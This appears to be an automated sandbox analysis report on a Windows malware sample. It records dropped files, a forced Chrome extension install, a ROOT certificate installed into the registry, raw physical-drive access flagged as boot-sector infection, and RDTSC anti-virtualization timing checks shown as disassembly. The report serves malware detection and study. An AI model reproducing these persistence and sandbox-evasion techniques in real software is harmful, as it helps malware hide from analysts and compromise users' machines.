Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Cyfj6XGbkd.exeStatic file information: File size 4247224 > 1048576
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_user.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeUnpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408D68
Source: MSIDCDD.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: Cyfj6XGbkd.exeStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: 56BB1610C0318054.exe.0.drStatic PE information: real checksum: 0xd69e9 should be: 0x41116d
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004038A0 push eax; ret 0_2_004038CE
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010579 push ecx; ret 0_2_1001058C
Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1_2_046BD9FC pushfd ; iretd 1_2_046BD9FE
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010579 push ecx; ret 2_2_1001058C
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E2F1 push ecx; ret 9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00993FB5 push ecx; ret 18_2_00993FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_user.dllJump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDCDD.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Roaming\1611970637183.exeJump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\dedbikgghcldkeaoafkhiajkpjhhppll\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DA70
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D7E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DA70
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D370
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D7E0
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C41D GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_0040C41D
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C00_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C02_2_100204C0
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E050h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E051h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
